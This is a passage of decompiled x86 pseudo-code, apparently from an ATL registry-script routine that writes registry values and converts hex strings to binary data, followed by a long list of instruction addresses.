							_v8 = 0xe;
							_v1596 = 0;
							_v1608 = 0;
							__ecx =  &_v2656;
							__eax = E0094E010( &_v2656);
							_v8 = 0xf;
							__edx =  &_v2668;
							__eax =  &_v1620;
							__ecx = _v96;
							__edx = _a20;
							__ecx = _v28;
							_v56 = E00948370(_v28, _a20, _v96,  &_v1620,  &_v2668);
							__eflags = _v56 - 1;
							if(_v56 != 1) {
								L177:
								__eflags = _v56;
								if(_v56 >= 0) {
									__eflags = _v84;
									if(_v84 != 0) {
										__eax =  &_v1608;
										__ecx =  &_v1584;
										__edx = _v84;
										__eax = _a12;
										__ecx = _v28;
										_v56 = E00948100(__ebx, _v28, _v84, __edi, __esi, _a12, _v84,  &_v1584,  &_v1608);
									}
								}
								__ecx =  &_v2696;
								__eax = E009441C0( &_v2696, 0);
								_v8 = 0x12;
								__eflags = _v84;
								if(_v84 != 0) {
									__edx = _a4;
									_v2696 = _a4;
								} else {
									__ecx = _v44;
									_v2696 = _v44;
								}
								__eflags = _v1608;
								if(_v1608 == 0) {
									__ecx = _v1584;
									_v2896 = _v1584;
								} else {
									__eax = _v1608;
									_v2896 = _v1608;
								}
								__edx = _v2668;
								__eax = _v1620;
								__ecx = _v2896;
								__ecx =  &_v2696;
								_v52 = E00944740(__ecx, __esi, _v2896, _v1620, _v2668);
								_v2696 = 0;
								__eflags = _v52;
								if(__eflags == 0) {
									__eax = _v1545 & 0x000000ff;
									__eflags = _v1545 & 0x000000ff;
									if((_v1545 & 0x000000ff) != 0) {
										_v44 = 0;
									}
									__eflags = _v84;
									if(_v84 == 0) {
										_v2904 = "default";
									} else {
										__eflags = _v1608;
										if(_v1608 == 0) {
											__edx = _v1584;
											_v2900 = _v1584;
										} else {
											__ecx = _v1608;
											_v2900 = _v1608;
										}
										__eax = _v2900;
										_v2904 = _v2900;
									}
									__eflags = _v1596;
									if(__eflags == 0) {
										__edx = _v1564;
										_v2908 = _v1564;
									} else {
										__ecx = _v1596;
										_v2908 = _v1596;
									}
									__eax = _v2904;
									_push(_v2904);
									__ecx = _v2908;
									__ecx = 0xb337ac;
									__eax = E0094F1F0(0xb337ac);
									__ecx =  &_v2812;
									E009423B0( &_v2812, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x311) = E009423E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2908);
									_v8 = 0xf;
									__ecx =  &_v2696;
									__eax = E00944220( &_v2696, __eflags);
									_v8 = 0xe;
									__ecx =  &_v2656;
									__eax = E0094DFD0( &_v2656);
									_v8 = 0xd;
									__ecx =  &_v1584;
									__eax = L00951F30( &_v1584, __eflags);
									_v8 = 1;
									__ecx =  &_v1564;
									__eax = L00951F30( &_v1564, __eflags);
									goto L200;
								} else {
									__edx = _v52;
									_v2804 = E00942E00(__ecx, __eflags, _v52);
									_v8 = 0xf;
									__ecx =  &_v2696;
									__eax = E00944220( &_v2696, __eflags);
									_v8 = 0xe;
									__ecx =  &_v2656;
									__eax = E0094DFD0( &_v2656);
									_v8 = 0xd;
									__ecx =  &_v1584;
									__eax = L00951F30( &_v1584, __eflags);
									_v8 = 1;
									__ecx =  &_v1564;
									__eax = L00951F30( &_v1564, __eflags);
									_v8 = 0;
									__ecx =  &_v124;
									__eax = E0094F220( &_v124);
									_v8 = 0xffffffff;
									__ecx =  &_v44;
									E00944220(__ecx, __eflags) = _v2804;
									goto L206;
								}
							} else {
								__eax =  &_v1596;
								__ecx =  &_v1564;
								__edx = _v2668;
								__eax = _a12;
								__ecx = _v28;
								__eax = E00948100(__ebx, _v28, _v2668, __edi, __esi, _a12, _v2668,  &_v1564,  &_v1596);
								__eflags = _v1596;
								if(_v1596 == 0) {
									__ecx = _v1564;
									_v1596 = _v1564;
								}
								__edx = _v1596;
								_v2676 = E00992E00(_v1596);
								_v2676 = _v2676 & 0x00000001;
								__eflags = _v2676 & 0x00000001;
								if(__eflags == 0) {
									__eax = _v2676;
									asm("cdq");
									_v2676 - __edx = _v2676 - __edx >> 1;
									_v2668 = _v2676 - __edx >> 1;
									_v8 = 0x10;
									__ecx = _v2668;
									__ecx =  &_v2656;
									__eax = E0094DF80(__ebx,  &_v2656, __eflags, _v2668);
									_v8 = 0xf;
									__ecx =  &_v2656;
									__eax = E0094DFC0( &_v2656);
									__eflags = __eax;
									if(__eax != 0) {
										__ecx =  &_v2656;
										_v1620 = E0094DFC0( &_v2656);
										__edx = _v2668;
										_v1620 = E0095AF80(__edi, _v1620, 0, _v2668);
										_v2680 = 0;
										while(1) {
											__edx = _v2680;
											__eflags = _v2680 - _v2676;
											if(_v2680 >= _v2676) {
												goto L177;
											}
											_v2680 = _v2680 & 0x00000001;
											1 = 1 - (_v2680 & 0x00000001);
											__esi = 1 - (_v2680 & 0x00000001) << 2;
											_v1596 = _v1596 + _v2680;
											__edx =  *(_v1596 + _v2680) & 0x000000ff;
											__ecx = _v28;
											__eax = L00947FE0(__ebx, _v28, __edi, __esi,  *(_v1596 + _v2680) & 0x000000ff);
											__edi = __al & 0x000000ff;
											__ecx = 1;
											__edi = (__al & 0x000000ff) << __cl;
											__eax = _v2680;
											asm("cdq");
											_v2680 - __edx = _v2680 - __edx >> 1;
											_v1620 =  *(_v1620 + (_v2680 - __edx >> 1)) & 0x000000ff;
											__ecx =  *(_v1620 + (_v2680 - __edx >> 1)) & 0x000000ff | __edi;
											__eax = _v2680;
											asm("cdq");
											__eax = _v2680 - __edx;
											__eax = _v2680 - __edx >> 1;
											__edx = _v1620;
											 *(_v1620 + __eax) = __cl;
											__ecx = _v2680;
											__ecx = _v2680 + 1;
											__eflags = __ecx;
											_v2680 = __ecx;
										}
										goto L177;
									} else {
										_v2800 = 0x8007000e;
										_v8 = 0xe;
										__ecx =  &_v2656;
										__eax = E0094DFD0( &_v2656);
										_v8 = 0xd;
										__ecx =  &_v1584;
										__eax = L00951F30( &_v1584, __eflags);
										_v8 = 1;
										__ecx =  &_v1564;
										__eax = L00951F30( &_v1564, __eflags);
										_v8 = 0;
										__ecx =  &_v124;
										__eax = E0094F220( &_v124);
										_v8 = 0xffffffff;
										__ecx =  &_v44;
										E00944220(__ecx, __eflags) = _v2800;
										goto L206;
									}
								} else {
									_push("Binary Data does not fall on BYTE boundries\n");
									_push(0);
									__ecx = 0xb337ac;
									_push(E0094F1F0(0xb337ac));
									__ecx =  &_v2792;
									_push(E009423B0( &_v2792, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x2f3));
									__eax = E009423E0(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 0x10;
									_v2796 = 0x80004005;
									_v8 = 0xe;
									__ecx =  &_v2656;
									__eax = E0094DFD0( &_v2656);
									_v8 = 0xd;
									__ecx =  &_v1584;
									__eax = L00951F30( &_v1584, __eflags);
									_v8 = 1;
									__ecx =  &_v1564;
									__eax = L00951F30( &_v1564, __eflags);
									_v8 = 0;
									__ecx =  &_v124;
									__eax = E0094F220( &_v124);
									_v8 = 0xffffffff;
									__ecx =  &_v44;
									E00944220(__ecx, __eflags) = _v2796;
									L206:
									_push(_t805);
									_push(_t769);
									E009D14C0(_t817, 0x949db8);
									_pop(_t771);
									_pop(_t810);
									 *[fs:0x0] = _v16;
									_pop(_t814);
									_pop(_t816);
									_pop(_t779);
									return E009D1520(E00957280(_t771, _t779, _v24 ^ _t817, _t810, _t814, _t816), _t817 - _t820 + 0xb58);
								}
							}
					}
				}
				_t807 =  &(( *_a8)[1]);
				__eflags = _t807;
				 *_a8 = _t807;
				_t805 =  *_a8;
				E0094A0F0(_v28,  *_t805,  &_v72,  &_v84,  &_v96);
				_v2816 = _v56;
				_v8 = 0;
				E0094F220( &_v124);
				_v8 = 0xffffffff;
				E00944220( &_v44, __eflags);
				_t769 = _v2816;
				goto L206;
			}

























































































































                      0x009486d3
                      0x009486d5
                      0x009486e0
                      0x009486fc
                      0x009486fc
                      0x009486fe
                      0x009486ff
                      0x00948704
                      0x00948706
                      0x00948709
                      0x0094870d
                      0x00948713
                      0x00948716
                      0x0094871e
                      0x00948723
                      0x0094872a
                      0x00948731
                      0x00948738
                      0x0094873c
                      0x00948743
                      0x0094874f
                      0x00948752
                      0x00948759
                      0x00948763
                      0x00948768
                      0x0094877d
                      0x00948783
                      0x00948788
                      0x00948795
                      0x009487a2
                      0x00949cf7
                      0x00949cf7
                      0x00949cf9
                      0x00949d13
                      0x00949d18
                      0x00949d1b
                      0x00949d1e
                      0x00949d20
                      0x00949d20
                      0x00949d1e
                      0x00949d21
                      0x00000000
                      0x00949d21
                      0x009487ae
                      0x00000000
                      0x009487b5
                      0x009487bf
                      0x009487c6
                      0x009487cb
                      0x009487d5
                      0x009487da
                      0x00000000
                      0x00000000
                      0x009487e5
                      0x009487e9
                      0x009487ed
                      0x0094883f
                      0x0094883f
                      0x00948844
                      0x00948847
                      0x0094884a
                      0x0094884c
                      0x00948850
                      0x00948854
                      0x00948858
                      0x0094885b
                      0x0094885d
                      0x00948860
                      0x00948863
                      0x00000000
                      0x00948863
                      0x009487ef
                      0x009487f3
                      0x009487f7
                      0x009487fb
                      0x009487ff
                      0x00948807
                      0x0094880a
                      0x0094880e
                      0x00000000
                      0x00948810
                      0x00948810
                      0x00948813
                      0x00948819
                      0x0094881d
                      0x00948820
                      0x00948825
                      0x0094882c
                      0x00948834
                      0x00000000
                      0x00948834
                      0x00000000
                      0x0094886d
                      0x00948871
                      0x00000000
                      0x00000000
                      0x00948873
                      0x00948877
                      0x0094887b
                      0x0094887f
                      0x00948887
                      0x0094888a
                      0x0094888e
                      0x00000000
                      0x00000000
                      0x00948890
                      0x00948893
                      0x00948899
                      0x0094889d
                      0x009488a0
                      0x009488a5
                      0x009488ac
                      0x009488b4
                      0x00000000
                      0x00000000
                      0x009488bf
                      0x009488bf
                      0x009488c3
                      0x009489f0
                      0x009489f4
                      0x009489f8
                      0x009489fc
                      0x00948a00
                      0x00948a08
                      0x00948a0b
                      0x00948a0f
                      0x00948a40
                      0x00948a40
                      0x00948a45
                      0x00948a48
                      0x00948a4b
                      0x00948a4d
                      0x00948a51
                      0x00948a55
                      0x00948a59
                      0x00948a5c
                      0x00948a5e
                      0x00948a61
                      0x00948a64
                      0x00000000
                      0x00948a64
                      0x00948a11
                      0x00948a14
                      0x00948a1a
                      0x00948a1e
                      0x00948a21
                      0x00948a26
                      0x00948a2d
                      0x00948a35
                      0x00000000
                      0x00948a35
                      0x009488c9
                      0x009488d3
                      0x009488d9
                      0x009488de
                      0x009488e5
                      0x009488ec
                      0x009488f0
                      0x009488f4
                      0x009488fc
                      0x009488ff
                      0x00948903
                      0x0094893f
                      0x00948946
                      0x0094894a
                      0x0094894c
                      0x00948953
                      0x00948963
                      0x00948969
                      0x00948955
                      0x00948955
                      0x0094895b
                      0x0094895b
                      0x00948974
                      0x0094897b
                      0x0094897f
                      0x00948987
                      0x00948987
                      0x0094898a
                      0x0094898e
                      0x009489d9
                      0x009489d9
                      0x009489dc
                      0x009489de
                      0x009489e0
                      0x009489e3
                      0x009489e9
                      0x00000000
                      0x00948990
                      0x00948990
                      0x00948994
                      0x00000000
                      0x00000000
                      0x00948996
                      0x009489a2
                      0x009489a8
                      0x009489ae
                      0x009489b3
                      0x009489b7
                      0x009489ba
                      0x009489bf
                      0x009489c6
                      0x009489ce
                      0x00000000
                      0x009489ce
                      0x0094898e
                      0x00948905
                      0x00948908
                      0x0094890e
                      0x00948914
                      0x00948919
                      0x0094891d
                      0x00948920
                      0x00948925
                      0x0094892c
                      0x00948934
                      0x00000000
                      0x00000000
                      0x00948a6e
                      0x00948a6e
                      0x00948a70
                      0x00948a8a
                      0x00948a92
                      0x00948a95
                      0x00948a97
                      0x00948a97
                      0x00948a95
                      0x00000000
                      0x00000000
                      0x00948a9d
                      0x00948aa2
                      0x00948aa5
                      0x00948aa8
                      0x00948aaa
                      0x00948aae
                      0x00948ab2
                      0x00948ab6
                      0x00948aba
                      0x00948abe
                      0x00948ac2
                      0x00948aca
                      0x00948acd
                      0x00948ad1
                      0x00948b02
                      0x00948b06
                      0x00948b0a
                      0x00948b0e
                      0x00948b11
                      0x00948b13
                      0x00948b16
                      0x00948b19
                      0x00948b1e
                      0x00948b22
                      0x00948ba2
                      0x00000000
                      0x00948ba2
                      0x00948b24
                      0x00948b28
                      0x00948b2a
                      0x00948b9e
                      0x00000000
                      0x00948b9e
                      0x00948b2c
                      0x00948b33
                      0x00948b3a
                      0x00948b41
                      0x00948b45
                      0x00948b48
                      0x00948b4d
                      0x00948b51
                      0x00948b58
                      0x00948b5c
                      0x00948b64
                      0x00948b67
                      0x00948b6b
                      0x00000000
                      0x00948b9c
                      0x00948b6d
                      0x00948b70
                      0x00948b76
                      0x00948b7a
                      0x00948b7d
                      0x00948b82
                      0x00948b89
                      0x00948b91
                      0x00000000
                      0x00948b91
                      0x00948ad3
                      0x00948ad6
                      0x00948adc
                      0x00948ae0
                      0x00948ae3
                      0x00948ae8
                      0x00948aef
                      0x00948af7
                      0x00000000
                      0x00000000
                      0x00948ba7
                      0x00948ba7
                      0x00948ba9
                      0x00948bc3
                      0x00948bcb
                      0x00948bce
                      0x00948bd0
                      0x00948bd0
                      0x00948bce
                      0x00948bd1
                      0x00948bdb
                      0x00948bdf
                      0x00948be2
                      0x00948be7
                      0x00948bee
                      0x00948bf6
                      0x00000000
                      0x00000000
                      0x00948c04
                      0x00948c0a
                      0x00948c10
                      0x00948c15
                      0x00948c18
                      0x00948c1b
                      0x00948c1d
                      0x00948c21
                      0x00948c25
                      0x00948c29
                      0x00948c2d
                      0x00948c31
                      0x00948c38
                      0x00948c40
                      0x00948c46
                      0x00948c4a
                      0x00948c4d
                      0x00948c52
                      0x00948c59
                      0x00948c61
                      0x00000000
                      0x00000000
                      0x00948c71
                      0x00948c75
                      0x00948f18
                      0x00948f18
                      0x00948f1d
                      0x00948f20
                      0x00948f23
                      0x00948f25
                      0x00948f29
                      0x00948f2d
                      0x00948f31
                      0x00948f34
                      0x00948f36
                      0x00948f39
                      0x00948f3c
                      0x00000000
                      0x00948f3c
                      0x00948c7b
                      0x00948c82
                      0x00948c86
                      0x00948c88
                      0x00948c8b
                      0x00948c8e
                      0x00948c8e
                      0x00948c95
                      0x00948c9b
                      0x00948ca0
                      0x00948ca4
                      0x00948caa
                      0x00948caf
                      0x00948cb3
                      0x00948cbd
                      0x00948cc7
                      0x00948cce
                      0x00948cd5
                      0x00948cd9
                      0x00948cdd
                      0x00948ce5
                      0x00948ce8
                      0x00948cec
                      0x00948cee
                      0x00948cf2
                      0x00948cf4
                      0x00948cfb
                      0x00948d02
                      0x00948d06
                      0x00948d0a
                      0x00948d12
                      0x00948d12
                      0x00948cf2
                      0x00948d17
                      0x00948d1d
                      0x00948d22
                      0x00948d26
                      0x00948d2a
                      0x00948d37
                      0x00948d3a
                      0x00948d2c
                      0x00948d2c
                      0x00948d2f
                      0x00948d2f
                      0x00948d40
                      0x00948d47
                      0x00948d57
                      0x00948d5d
                      0x00948d49
                      0x00948d49
                      0x00948d4f
                      0x00948d4f
                      0x00948d63
                      0x00948d67
                      0x00948d9a
                      0x00948d69
                      0x00948d69
                      0x00948d70
                      0x00948d80
                      0x00948d86
                      0x00948d72
                      0x00948d72
                      0x00948d78
                      0x00948d78
                      0x00948d8c
                      0x00948d92
                      0x00948d92
                      0x00948da6
                      0x00948dad
                      0x00948db4
                      0x00948dbf
                      0x00948dc2
                      0x00948dcc
                      0x00948dd0
                      0x00948e37
                      0x00948e3e
                      0x00948e40
                      0x00948e42
                      0x00948e42
                      0x00948e49
                      0x00948e4d
                      0x00948e80
                      0x00948e4f
                      0x00948e4f
                      0x00948e56
                      0x00948e66
                      0x00948e6c
                      0x00948e58
                      0x00948e58
                      0x00948e5e
                      0x00948e5e
                      0x00948e72
                      0x00948e78
                      0x00948e78
                      0x00948e8a
                      0x00948e91
                      0x00948ea1
                      0x00948ea7
                      0x00948e93
                      0x00948e93
                      0x00948e99
                      0x00948e99
                      0x00948ead
                      0x00948eb3
                      0x00948eb4
                      0x00948ec2
                      0x00948ec7
                      0x00948ed7
                      0x00948ee3
                      0x00948eeb
                      0x00948eef
                      0x00948ef5
                      0x00948efa
                      0x00948efe
                      0x00948f04
                      0x00948f09
                      0x00948f0d
                      0x00948f13
                      0x00000000
                      0x00948dd2
                      0x00948dd2
                      0x00948dde
                      0x00948de4
                      0x00948de8
                      0x00948dee
                      0x00948df3
                      0x00948df7
                      0x00948dfd
                      0x00948e02
                      0x00948e06
                      0x00948e0c
                      0x00948e11
                      0x00948e15
                      0x00948e18
                      0x00948e1d
                      0x00948e24
                      0x00948e2c
                      0x00000000
                      0x00948e2c
                      0x00000000
                      0x00948f46
                      0x00948f4a
                      0x0094943b
                      0x0094943b
                      0x00949440
                      0x00949443
                      0x00949446
                      0x00949448
                      0x0094944c
                      0x00949450
                      0x00949454
                      0x00949457
                      0x00949459
                      0x0094945c
                      0x0094945f
                      0x00000000
                      0x0094945f
                      0x00948f50
                      0x00948f57
                      0x00948f5b
                      0x00948f5d
                      0x00948f60
                      0x00948f63
                      0x00948f63
                      0x00948f6a
                      0x00948f70
                      0x00948f75
                      0x00948f79
                      0x00948f7f
                      0x00948f84
                      0x00948f88
                      0x00948f92
                      0x00948f9c
                      0x00948fa3
                      0x00948faa
                      0x00948fae
                      0x00948fb2
                      0x00948fba
                      0x00948fbd
                      0x00948fc1
                      0x00948fc3
                      0x00948fc7
                      0x00948fc9
                      0x00948fd0
                      0x00948fd7
                      0x00948fdb
                      0x00948fdf
                      0x00948fe7
                      0x00948fe7
                      0x00948fc7
                      0x00948fea
                      0x00948fee
                      0x00949021
                      0x00948ff0
                      0x00948ff0
                      0x00948ff7
                      0x00949007
                      0x0094900d
                      0x00948ff9
                      0x00948ff9
                      0x00948fff
                      0x00948fff
                      0x00949013
                      0x00949019
                      0x00949019
                      0x0094902b
                      0x00949032
                      0x00949042
                      0x00949048
                      0x00949034
                      0x00949034
                      0x0094903a
                      0x0094903a
                      0x0094904e
                      0x00949054
                      0x00949055
                      0x00949063
                      0x00949068
                      0x00949078
                      0x00949084
                      0x0094908c
                      0x00949093
                      0x009490a3
                      0x009490a9
                      0x00949095
                      0x00949095
                      0x0094909b
                      0x0094909b
                      0x009490af
                      0x009490b5
                      0x009490bb
                      0x009490c2
                      0x009490cd
                      0x009490d3
                      0x009490d9
                      0x009490de
                      0x009490e2
                      0x009490e6
                      0x009490ed
                      0x009490f3
                      0x00949100
                      0x00949110
                      0x00949116
                      0x0094911b
                      0x0094911d
                      0x009493b1
                      0x009493bb
                      0x009493bf
                      0x009493c5
                      0x009493ca
                      0x009493ce
                      0x009493d4
                      0x009493d9
                      0x009493dd
                      0x009493e3
                      0x009493e8
                      0x009493ec
                      0x009493ef
                      0x009493f4
                      0x009493fb
                      0x00949403
                      0x00000000
                      0x00949123
                      0x00949123
                      0x0094912e
                      0x00949134
                      0x0094913a
                      0x00949140
                      0x0094914a
                      0x0094914a
                      0x00949150
                      0x00949153
                      0x00949155
                      0x00000000
                      0x00000000
                      0x0094915b
                      0x0094915d
                      0x00949164
                      0x0094916a
                      0x00949171
                      0x00949177
                      0x0094917d
                      0x00949180
                      0x00949183
                      0x009491cc
                      0x009491cc
                      0x009491d2
                      0x009491d8
                      0x009491da
                      0x009491dc
                      0x009491de
                      0x009491e4
                      0x009491e8
                      0x009491ee
                      0x009491f0
                      0x009491f5
                      0x009491f7
                      0x00949236
                      0x0094923c
                      0x0094923f
                      0x00949245
                      0x0094924b
                      0x0094924b
                      0x0094924e
                      0x00949254
                      0x0094925a
                      0x0094925d
                      0x00000000
                      0x0094925d
                      0x009491ff
                      0x00949202
                      0x0094920e
                      0x00949211
                      0x00949217
                      0x0094921d
                      0x00949220
                      0x00949222
                      0x00949226
                      0x0094922c
                      0x00949232
                      0x00949234
                      0x00000000
                      0x00949234
                      0x00000000
                      0x00949224
                      0x00949185
                      0x0094918b
                      0x0094918e
                      0x00949191
                      0x00000000
                      0x00000000
                      0x00949193
                      0x00949199
                      0x009491a2
                      0x009491a5
                      0x009491ab
                      0x009491ad
                      0x009491b4
                      0x009491ba
                      0x009491c1
                      0x00000000
                      0x009491c1
                      0x00949268
                      0x0094926e
                      0x00949277
                      0x0094927a
                      0x00949280
                      0x00949286
                      0x0094928b
                      0x00949291
                      0x00949296
                      0x0094929a
                      0x009492a7
                      0x009492aa
                      0x0094929c
                      0x0094929c
                      0x0094929f
                      0x0094929f
                      0x009492b0
                      0x009492b4
                      0x009492e7
                      0x009492b6
                      0x009492b6
                      0x009492bd
                      0x009492cd
                      0x009492d3
                      0x009492bf
                      0x009492bf
                      0x009492c5
                      0x009492c5
                      0x009492d9
                      0x009492df
                      0x009492df
                      0x009492f1
                      0x009492fd
                      0x00949304
                      0x0094930f
                      0x00949312
                      0x0094931c
                      0x00949320
                      0x00949392
                      0x00949399
                      0x0094939b
                      0x0094939d
                      0x0094939d
                      0x009493a4
                      0x009493aa
                      0x0094940e
                      0x00949412
                      0x00949418
                      0x0094941d
                      0x00949421
                      0x00949427
                      0x0094942c
                      0x00949430
                      0x00949436
                      0x00000000
                      0x00949322
                      0x00949322
                      0x0094932e
                      0x00949334
                      0x0094933a
                      0x0094933f
                      0x00949343
                      0x00949349
                      0x0094934e
                      0x00949352
                      0x00949358
                      0x0094935d
                      0x00949361
                      0x00949367
                      0x0094936c
                      0x00949370
                      0x00949373
                      0x00949378
                      0x0094937f
                      0x00949387
                      0x00000000
                      0x00949387
                      0x00949320
                      0x00000000
                      0x00949469
                      0x0094946d
                      0x009497b9
                      0x009497b9
                      0x009497be
                      0x009497c1
                      0x009497c4
                      0x009497c6
                      0x009497ca
                      0x009497ce
                      0x009497d2
                      0x009497d5
                      0x009497d7
                      0x009497da
                      0x009497dd
                      0x00000000
                      0x009497dd
                      0x00949473
                      0x0094947a
                      0x0094947e
                      0x00949480
                      0x00949483
                      0x00949486
                      0x00949486
                      0x0094948d
                      0x00949493
                      0x00949498
                      0x0094949c
                      0x009494a2
                      0x009494a7
                      0x009494ab
                      0x009494b5
                      0x009494bf
                      0x009494c6
                      0x009494ca
                      0x009494ce
                      0x009494d6
                      0x009494d9
                      0x009494dd
                      0x009495cc
                      0x009495cc
                      0x009495d0
                      0x009495d2
                      0x009495d6
                      0x009495d8
                      0x009495df
                      0x009495e6
                      0x009495ea
                      0x009495ee
                      0x009495f6
                      0x009495f6
                      0x009495d6
                      0x009495fb
                      0x00949601
                      0x00949606
                      0x0094960a
                      0x0094960e
                      0x0094961b
                      0x0094961e
                      0x00949610
                      0x00949610
                      0x00949613
                      0x00949613
                      0x00949624
                      0x0094962b
                      0x0094963b
                      0x00949641
                      0x0094962d
                      0x0094962d
                      0x00949633
                      0x00949633
                      0x00949647
                      0x0094964e
                      0x00949655
                      0x00949660
                      0x00949663
                      0x0094966d
                      0x00949671
                      0x009496d8
                      0x009496df
                      0x009496e1
                      0x009496e3
                      0x009496e3
                      0x009496ea
                      0x009496ee
                      0x00949721
                      0x009496f0
                      0x009496f0
                      0x009496f7
                      0x00949707
                      0x0094970d
                      0x009496f9
                      0x009496f9
                      0x009496ff
                      0x009496ff
                      0x00949713
                      0x00949719
                      0x00949719
                      0x0094972b
                      0x00949732
                      0x00949742
                      0x00949748
                      0x00949734
                      0x00949734
                      0x0094973a
                      0x0094973a
                      0x0094974e
                      0x00949754
                      0x00949755
                      0x00949763
                      0x00949768
                      0x00949778
                      0x00949784
                      0x0094978c
                      0x00949790
                      0x00949796
                      0x0094979b
                      0x0094979f
                      0x009497a5
                      0x009497aa
                      0x009497ae
                      0x009497b4
                      0x00000000
                      0x00949673
                      0x00949673
                      0x0094967f
                      0x00949685
                      0x00949689
                      0x0094968f
                      0x00949694
                      0x00949698
                      0x0094969e
                      0x009496a3
                      0x009496a7
                      0x009496ad
                      0x009496b2
                      0x009496b6
                      0x009496b9
                      0x009496be
                      0x009496c5
                      0x009496cd
                      0x00000000
                      0x009496cd
                      0x009494e3
                      0x009494e3
                      0x009494ea
                      0x009494f1
                      0x009494f8
                      0x009494fc
                      0x009494ff
                      0x00949504
                      0x0094950b
                      0x0094951b
                      0x00949521
                      0x0094950d
                      0x0094950d
                      0x00949513
                      0x00949513
                      0x00949527
                      0x0094952e
                      0x00949534
                      0x00949539
                      0x0094953b
                      0x00949541
                      0x00949542
                      0x00949544
                      0x00949546
                      0x0094954c
                      0x00949551
                      0x00949552
                      0x00949558
                      0x0094955f
                      0x00949562
                      0x00949566
                      0x009495c1
                      0x009495c7
                      0x00000000
                      0x00949568
                      0x00949568
                      0x00949572
                      0x00949578
                      0x0094957d
                      0x00949581
                      0x00949587
                      0x0094958c
                      0x00949590
                      0x00949596
                      0x0094959b
                      0x0094959f
                      0x009495a2
                      0x009495a7
                      0x009495ae
                      0x009495b6
                      0x00000000
                      0x009495b6
                      0x00949566
                      0x00000000
                      0x009497e7
                      0x009497eb
                      0x00949ccc
                      0x00949ccc
                      0x00949cd1
                      0x00949cd4
                      0x00949cd7
                      0x00949cd9
                      0x00949cdd
                      0x00949ce1
                      0x00949ce5
                      0x00949ce8
                      0x00949cea
                      0x00949ced
                      0x00949cf0
                      0x00000000
                      0x00949cf0
                      0x009497f1
                      0x009497f8
                      0x009497fc
                      0x009497fe
                      0x00949801
                      0x00949804
                      0x00949804
                      0x0094980b
                      0x00949811
                      0x00949816
                      0x0094981a
                      0x00949820
                      0x00949825
                      0x00949829
                      0x00949833
                      0x0094983d
                      0x00949843
                      0x00949848
                      0x0094984c
                      0x00949853
                      0x0094985a
                      0x0094985e
                      0x00949862
                      0x0094986a
                      0x0094986d
                      0x00949871
                      0x00949aba
                      0x00949aba
                      0x00949abe
                      0x00949ac0
                      0x00949ac4
                      0x00949ac6
                      0x00949acd
                      0x00949ad4
                      0x00949ad8
                      0x00949adc
                      0x00949ae4
                      0x00949ae4
                      0x00949ac4
                      0x00949ae9
                      0x00949aef
                      0x00949af4
                      0x00949af8
                      0x00949afc
                      0x00949b09
                      0x00949b0c
                      0x00949afe
                      0x00949afe
                      0x00949b01
                      0x00949b01
                      0x00949b12
                      0x00949b19
                      0x00949b29
                      0x00949b2f
                      0x00949b1b
                      0x00949b1b
                      0x00949b21
                      0x00949b21
                      0x00949b35
                      0x00949b3c
                      0x00949b43
                      0x00949b4a
                      0x00949b55
                      0x00949b58
                      0x00949b62
                      0x00949b66
                      0x00949bdc
                      0x00949be3
                      0x00949be5
                      0x00949be7
                      0x00949be7
                      0x00949bee
                      0x00949bf2
                      0x00949c25
                      0x00949bf4
                      0x00949bf4
                      0x00949bfb
                      0x00949c0b
                      0x00949c11
                      0x00949bfd
                      0x00949bfd
                      0x00949c03
                      0x00949c03
                      0x00949c17
                      0x00949c1d
                      0x00949c1d
                      0x00949c2f
                      0x00949c36
                      0x00949c46
                      0x00949c4c
                      0x00949c38
                      0x00949c38
                      0x00949c3e
                      0x00949c3e
                      0x00949c52
                      0x00949c58
                      0x00949c59
                      0x00949c67
                      0x00949c6c
                      0x00949c7c
                      0x00949c88
                      0x00949c90
                      0x00949c94
                      0x00949c9a
                      0x00949c9f
                      0x00949ca3
                      0x00949ca9
                      0x00949cae
                      0x00949cb2
                      0x00949cb8
                      0x00949cbd
                      0x00949cc1
                      0x00949cc7
                      0x00000000
                      0x00949b68
                      0x00949b68
                      0x00949b74
                      0x00949b7a
                      0x00949b7e
                      0x00949b84
                      0x00949b89
                      0x00949b8d
                      0x00949b93
                      0x00949b98
                      0x00949b9c
                      0x00949ba2
                      0x00949ba7
                      0x00949bab
                      0x00949bb1
                      0x00949bb6
                      0x00949bba
                      0x00949bbd
                      0x00949bc2
                      0x00949bc9
                      0x00949bd1
                      0x00000000
                      0x00949bd1
                      0x00949877
                      0x00949877
                      0x0094987e
                      0x00949885
                      0x0094988c
                      0x00949890
                      0x00949893
                      0x00949898
                      0x0094989f
                      0x009498a1
                      0x009498a7
                      0x009498a7
                      0x009498ad
                      0x009498bc
                      0x009498c8
                      0x009498c8
                      0x009498cb
                      0x0094995e
                      0x00949964
                      0x00949967
                      0x00949969
                      0x0094996f
                      0x00949973
                      0x0094997a
                      0x00949980
                      0x0094998d
                      0x0094999d
                      0x009499a3
                      0x009499a8
                      0x009499aa
                      0x00949a09
                      0x00949a14
                      0x00949a1a
                      0x00949a2a
                      0x00949a32
                      0x00949a4d
                      0x00949a4d
                      0x00949a53
                      0x00949a59
                      0x00000000
                      0x00000000
                      0x00949a61
                      0x00949a69
                      0x00949a6b
                      0x00949a74
                      0x00949a7a
                      0x00949a7e
                      0x00949a81
                      0x00949a86
                      0x00949a89
                      0x00949a8b
                      0x00949a8d
                      0x00949a93
                      0x00949a96
                      0x00949a9e
                      0x00949aa2
                      0x00949aa4
                      0x00949aaa
                      0x00949aab
                      0x00949aad
                      0x00949aaf
                      0x00949ab5
                      0x00949a3e
                      0x00949a44
                      0x00949a44
                      0x00949a47
                      0x00949a47
                      0x00000000
                      0x009499ac
                      0x009499ac
                      0x009499b6
                      0x009499ba
                      0x009499c0
                      0x009499c5
                      0x009499c9
                      0x009499cf
                      0x009499d4
                      0x009499d8
                      0x009499de
                      0x009499e3
                      0x009499e7
                      0x009499ea
                      0x009499ef
                      0x009499f6
                      0x009499fe
                      0x00000000
                      0x009499fe
                      0x009498d1
                      0x009498d1
                      0x009498d6
                      0x009498d8
                      0x009498e2
                      0x009498ed
                      0x009498f8
                      0x009498f9
                      0x009498fe
                      0x00949901
                      0x0094990b
                      0x0094990f
                      0x00949915
                      0x0094991a
                      0x0094991e
                      0x00949924
                      0x00949929
